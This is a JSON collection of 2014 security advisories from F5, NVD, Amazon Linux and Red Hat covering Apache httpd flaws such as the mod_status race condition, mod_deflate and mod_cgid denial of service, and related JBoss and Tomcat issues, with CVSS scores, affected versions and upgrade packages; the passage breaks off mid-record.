{"f5": [{"lastseen": "2016-03-19T09:01:48", "bulletinFamily": "software", "cvelist": ["CVE-2014-0231", "CVE-2014-3523", "CVE-2014-0118", "CVE-2014-0117", "CVE-2014-0226"], "edition": 1, "description": "Recommended action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the table does not list any version in the column, then no upgrade candidate currently exists.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2014-12-04T00:00:00", "published": "2014-12-04T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/800/sol15893.html", "id": "SOL15893", "title": "SOL15893 - Apache HTTP server vulnerabilities CVE-2014-0117, CVE-2014-0118, CVE-2014-0226, CVE-2014-0231, and CVE-2014-3523", "type": "f5", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2020-12-09T19:58:19", "description": "Race condition in the mod_status module in the Apache HTTP Server before 2.4.10 allows remote attackers to cause a denial of service (heap-based buffer overflow), or possibly obtain sensitive credential information or execute arbitrary code, via a crafted request that triggers improper scoreboard handling within the status_handler function in modules/generators/mod_status.c and the lua_ap_scoreboard_worker function in modules/lua/lua_request.c.", "edition": 8, "cvss3": {}, "published": "2014-07-20T11:12:00", "title": "CVE-2014-0226", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0226"], "modified": "2017-12-09T02:29:00", "cpe": ["cpe:/a:apache:http_server:2.4.1", "cpe:/a:apache:http_server:2.4.2", "cpe:/a:apache:http_server:2.4.8", "cpe:/a:apache:http_server:2.4.3", "cpe:/a:apache:http_server:2.4.9", "cpe:/a:apache:http_server:2.4.6", "cpe:/a:apache:http_server:2.4.7", "cpe:/a:apache:http_server:2.4.4"], "id": "CVE-2014-0226", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0226", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:http_server:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.9:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:58:19", "description": "The deflate_in_filter function in mod_deflate.c in the mod_deflate module in the Apache HTTP Server before 2.4.10, when request body decompression is enabled, allows remote attackers to cause a denial of service (resource consumption) via crafted request data that decompresses to a much larger size.", "edition": 7, "cvss3": {}, "published": "2014-07-20T11:12:00", "title": "CVE-2014-0118", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0118"], "modified": "2017-12-09T02:29:00", "cpe": ["cpe:/a:apache:http_server:2.4.1", "cpe:/a:apache:http_server:2.4.2", "cpe:/a:apache:http_server:2.4.8", "cpe:/a:apache:http_server:2.4.3", "cpe:/a:apache:http_server:2.4.9", "cpe:/a:apache:http_server:2.4.6", "cpe:/a:apache:http_server:2.4.7", "cpe:/a:apache:http_server:2.4.4"], "id": "CVE-2014-0118", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0118", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:apache:http_server:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.9:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:58:19", "description": "The mod_cgid module in the Apache HTTP Server before 2.4.10 does not have a timeout mechanism, which allows remote attackers to cause a denial of service (process hang) via a request to a CGI script that does not read from its stdin file descriptor.", "edition": 7, "cvss3": {}, "published": "2014-07-20T11:12:00", "title": "CVE-2014-0231", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0231"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:apache:http_server:2.2.27", "cpe:/a:apache:http_server:2.2.15", "cpe:/a:apache:http_server:2.2.11", "cpe:/a:apache:http_server:2.4.1", "cpe:/a:apache:http_server:2.2.12", "cpe:/a:apache:http_server:2.2.16", "cpe:/a:apache:http_server:2.2.22", "cpe:/a:apache:http_server:2.4.2", "cpe:/a:apache:http_server:2.2.9", "cpe:/a:apache:http_server:-", "cpe:/a:apache:http_server:2.4.8", "cpe:/a:apache:http_server:2.4.3", "cpe:/a:apache:http_server:2.2.4", "cpe:/a:apache:http_server:2.2.10", "cpe:/a:apache:http_server:2.2.19", "cpe:/a:apache:http_server:2.2.24", "cpe:/a:apache:http_server:2.2.17", "cpe:/a:apache:http_server:2.2.13", "cpe:/a:apache:http_server:2.4.9", "cpe:/a:apache:http_server:2.4.6", "cpe:/a:apache:http_server:2.2.6", "cpe:/a:apache:http_server:2.2.23", "cpe:/a:apache:http_server:2.2.0", "cpe:/a:apache:http_server:2.2.18", "cpe:/a:apache:http_server:2.2.20", "cpe:/a:apache:http_server:2.2.25", "cpe:/a:apache:http_server:2.4.7", "cpe:/a:apache:http_server:2.4.4", "cpe:/a:apache:http_server:2.2.2", "cpe:/a:apache:http_server:2.2.14", "cpe:/a:apache:http_server:2.2.21", "cpe:/a:apache:http_server:2.2.3", "cpe:/a:apache:http_server:2.2.26", "cpe:/a:apache:http_server:2.2.8"], "id": "CVE-2014-0231", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0231", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:apache:http_server:2.2.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:-:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.25:*:*:*:*:*:*:*"]}], "amazon": [{"lastseen": "2020-11-10T12:35:13", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "**Issue Overview:**\n\nA race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the \"apache\" user. ([CVE-2014-0226 __](<https://access.redhat.com/security/cve/CVE-2014-0226>))\n\nA denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the \"DEFLATE\" input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system. ([CVE-2014-0118 __](<https://access.redhat.com/security/cve/CVE-2014-0118>))\n\nA denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely. ([CVE-2014-0231 __](<https://access.redhat.com/security/cve/CVE-2014-0231>))\n\n \n**Affected Packages:** \n\n\nhttpd\n\n \n**Issue Correction:** \nRun _yum update httpd_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n httpd-tools-2.2.27-1.3.amzn1.i686 \n httpd-devel-2.2.27-1.3.amzn1.i686 \n httpd-2.2.27-1.3.amzn1.i686 \n mod_ssl-2.2.27-1.3.amzn1.i686 \n httpd-debuginfo-2.2.27-1.3.amzn1.i686 \n \n noarch: \n httpd-manual-2.2.27-1.3.amzn1.noarch \n \n src: \n httpd-2.2.27-1.3.amzn1.src \n \n x86_64: \n httpd-tools-2.2.27-1.3.amzn1.x86_64 \n httpd-devel-2.2.27-1.3.amzn1.x86_64 \n mod_ssl-2.2.27-1.3.amzn1.x86_64 \n httpd-2.2.27-1.3.amzn1.x86_64 \n httpd-debuginfo-2.2.27-1.3.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-07-31T13:54:00", "published": "2014-07-31T13:54:00", "id": "ALAS-2014-388", "href": "https://alas.aws.amazon.com/ALAS-2014-388.html", "title": "Important: httpd", "type": "amazon", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-10T12:35:02", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "description": "**Issue Overview:**\n\nA race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the \"apache\" user. ([CVE-2014-0226 __](<https://access.redhat.com/security/cve/CVE-2014-0226>))\n\nA denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the \"DEFLATE\" input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system. ([CVE-2014-0118 __](<https://access.redhat.com/security/cve/CVE-2014-0118>))\n\nA denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely. ([CVE-2014-0231 __](<https://access.redhat.com/security/cve/CVE-2014-0231>))\n\n \n**Affected Packages:** \n\n\nhttpd24\n\n \n**Issue Correction:** \nRun _yum update httpd24_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n mod24_proxy_html-2.4.10-1.59.amzn1.i686 \n httpd24-2.4.10-1.59.amzn1.i686 \n httpd24-debuginfo-2.4.10-1.59.amzn1.i686 \n mod24_ldap-2.4.10-1.59.amzn1.i686 \n httpd24-tools-2.4.10-1.59.amzn1.i686 \n mod24_ssl-2.4.10-1.59.amzn1.i686 \n httpd24-devel-2.4.10-1.59.amzn1.i686 \n mod24_session-2.4.10-1.59.amzn1.i686 \n \n noarch: \n httpd24-manual-2.4.10-1.59.amzn1.noarch \n \n src: \n httpd24-2.4.10-1.59.amzn1.src \n \n x86_64: \n mod24_proxy_html-2.4.10-1.59.amzn1.x86_64 \n httpd24-tools-2.4.10-1.59.amzn1.x86_64 \n mod24_ldap-2.4.10-1.59.amzn1.x86_64 \n httpd24-2.4.10-1.59.amzn1.x86_64 \n httpd24-debuginfo-2.4.10-1.59.amzn1.x86_64 \n httpd24-devel-2.4.10-1.59.amzn1.x86_64 \n mod24_session-2.4.10-1.59.amzn1.x86_64 \n mod24_ssl-2.4.10-1.59.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-07-31T13:56:00", "published": "2014-07-31T13:56:00", "id": "ALAS-2014-389", "href": "https://alas.aws.amazon.com/ALAS-2014-389.html", "title": "Important: httpd24", "type": "amazon", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:44:40", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0118", "CVE-2014-0226", "CVE-2014-0231"], "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient,\nand extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\n", "modified": "2018-06-06T20:24:08", "published": "2014-07-23T04:00:00", "id": "RHSA-2014:0920", "href": "https://access.redhat.com/errata/RHSA-2014:0920", "type": "redhat", "title": "(RHSA-2014:0920) Important: httpd security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:50", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4352", "CVE-2014-0117", "CVE-2014-0118", "CVE-2014-0226", "CVE-2014-0231"], "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient,\nand extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA NULL pointer dereference flaw was found in the mod_cache httpd module.\nA malicious HTTP server could cause the httpd child process to crash when\nthe Apache HTTP Server was used as a forward proxy with caching.\n(CVE-2013-4352)\n\nA denial of service flaw was found in the mod_proxy httpd module. A remote\nattacker could send a specially crafted request to a server configured as a\nreverse proxy using a threaded Multi-Processing Modules (MPM) that would\ncause the httpd child process to crash. (CVE-2014-0117)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\n", "modified": "2018-04-12T03:33:37", "published": "2014-07-23T04:00:00", "id": "RHSA-2014:0921", "href": "https://access.redhat.com/errata/RHSA-2014:0921", "type": "redhat", "title": "(RHSA-2014:0921) Important: httpd security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0118", "CVE-2014-0193", "CVE-2014-0226", "CVE-2014-0231", "CVE-2014-3472"], "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nA flaw was found in the WebSocket08FrameDecoder implementation that could\nallow a remote attacker to trigger an Out Of Memory Exception by issuing a\nseries of TextWebSocketFrame and ContinuationWebSocketFrames. Depending on\nthe server configuration, this could lead to a denial of service.\n(CVE-2014-0193)\n\nIt was found that the isCallerInRole() method of the SimpleSecurityManager\ndid not correctly check caller roles. A remote, authenticated attacker\ncould use this flaw to circumvent the caller check in applications that use\nblack list access control based on caller roles. (CVE-2014-3472)\n\nRed Hat would like to thank James Roper of Typesafe for reporting\nCVE-2014-0193, and CA Technologies for reporting CVE-2014-3472.\n\nThis release of JBoss Enterprise Application Platform also includes bug\nfixes and enhancements. Documentation for these changes will be available\nshortly from the JBoss Enterprise Application Platform 6.3.0 Release Notes,\nlinked to in the References.\n\nAll users who require JBoss Enterprise Application Platform 6.3.0 on Red\nHat Enterprise Linux 6 should install these new packages. The JBoss server\nprocess must be restarted for the update to take effect.\n", "modified": "2018-06-07T02:39:04", "published": "2014-08-06T04:00:00", "id": "RHSA-2014:1020", "href": "https://access.redhat.com/errata/RHSA-2014:1020", "type": "redhat", "title": "(RHSA-2014:1020) Important: Red Hat JBoss Enterprise Application Platform 6.3.0 update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:46", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4590", "CVE-2014-0118", "CVE-2014-0119", "CVE-2014-0226", "CVE-2014-0231"], "description": "Red Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library.\n\nThis release serves as a replacement for Red Hat JBoss Web Server 2.0.1,\nand includes several bug fixes. Refer to the Red Hat JBoss Web Server 2.1.0\nRelease Notes, linked to in the References section, for information on the\nmost significant of these changes.\n\nThe following security issues are also fixed with this release:\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nIt was found that several application-provided XML files, such as web.xml,\ncontent.xml, *.tld, *.tagx, and *.jspx, resolved external entities,\npermitting XML External Entity (XXE) attacks. An attacker able to deploy\nmalicious applications to Tomcat could use this flaw to circumvent security\nrestrictions set by the JSM, and gain access to sensitive information on\nthe system. Note that this flaw only affected deployments in which Tomcat\nis running applications from untrusted sources, such as in a shared hosting\nenvironment. (CVE-2013-4590)\n\nIt was found that, in certain circumstances, it was possible for a\nmalicious web application to replace the XML parsers used by Tomcat to\nprocess XSLTs for the default servlet, JSP documents, tag library\ndescriptors (TLDs), and tag plug-in configuration files. The injected XML\nparser(s) could then bypass the limits imposed on XML external entities\nand/or gain access to the XML files processed for other web applications\ndeployed on the same Tomcat instance. (CVE-2014-0119)\n\nAll users of Red Hat JBoss Web Server 2.0.1 on Red Hat Enterprise Linux 5\nare advised to upgrade to Red Hat JBoss Web Server 2.1.0. The JBoss server\nprocess must be restarted for this update to take effect.\n", "modified": "2018-08-09T19:46:59", "published": "2014-08-21T04:00:00", "id": "RHSA-2014:1088", "href": "https://access.redhat.com/errata/RHSA-2014:1088", "type": "redhat", "title": "(RHSA-2014:1088) Important: Red Hat JBoss Web Server 2.1.0 update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:37", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4352", "CVE-2014-0117", "CVE-2014-0118", "CVE-2014-0226", "CVE-2014-0231"], "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient,\nand extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA NULL pointer dereference flaw was found in the mod_cache httpd module.\nA malicious HTTP server could cause the httpd child process to crash when\nthe Apache HTTP Server was used as a forward proxy with caching.\n(CVE-2013-4352)\n\nA denial of service flaw was found in the mod_proxy httpd module. A remote\nattacker could send a specially crafted request to a server configured as a\nreverse proxy using a threaded Multi-Processing Modules (MPM) that would\ncause the httpd child process to crash. (CVE-2014-0117)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd24-httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted automatically.\n", "modified": "2018-06-13T01:28:21", "published": "2014-07-23T04:00:00", "id": "RHSA-2014:0922", "href": "https://access.redhat.com/errata/RHSA-2014:0922", "type": "redhat", "title": "(RHSA-2014:0922) Important: httpd24-httpd security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-11T13:32:33", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0118", "CVE-2014-0193", "CVE-2014-0226", "CVE-2014-0231", "CVE-2014-3464", "CVE-2014-3472"], "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nA flaw was found in the WebSocket08FrameDecoder implementation that could\nallow a remote attacker to trigger an Out Of Memory Exception by issuing a\nseries of TextWebSocketFrame and ContinuationWebSocketFrames. Depending on\nthe server configuration, this could lead to a denial of service.\n(CVE-2014-0193)\n\nIt was found that the isCallerInRole() method of the SimpleSecurityManager\ndid not correctly check caller roles. A remote, authenticated attacker\ncould use this flaw to circumvent the caller check in applications that use\nblack list access control based on caller roles. (CVE-2014-3472)\n\nRed Hat would like to thank James Roper of Typesafe for reporting\nCVE-2014-0193, and CA Technologies for reporting CVE-2014-3472.\n\nThis release of JBoss Enterprise Application Platform also includes bug\nfixes and enhancements. Documentation for these changes will be available\nshortly from the JBoss Enterprise Application Platform 6.3.0 Release Notes,\nlinked to in the References.\n\nAll users who require JBoss Enterprise Application Platform 6.3.0 on Red\nHat Enterprise Linux 5 should install these new packages. The JBoss server\nprocess must be restarted for the update to take effect.\n", "modified": "2016-04-04T18:31:13", "published": "2014-08-06T04:00:00", "id": "RHSA-2014:1019", "href": "https://access.redhat.com/errata/RHSA-2014:1019", "type": "redhat", "title": "(RHSA-2014:1019) Important: Red Hat JBoss Enterprise Application Platform 6.3.0 update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-11T13:33:31", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4590", "CVE-2014-0118", "CVE-2014-0119", "CVE-2014-0226", "CVE-2014-0227", "CVE-2014-0231"], "description": "Red Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library.\n\nThis release serves as a replacement for Red Hat JBoss Web Server 2.0.1,\nand includes several bug fixes. Refer to the Red Hat JBoss Web Server 2.1.0\nRelease Notes, linked to in the References section, for information on the\nmost significant of these changes.\n\nThe following security issues are also fixed with this release:\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid 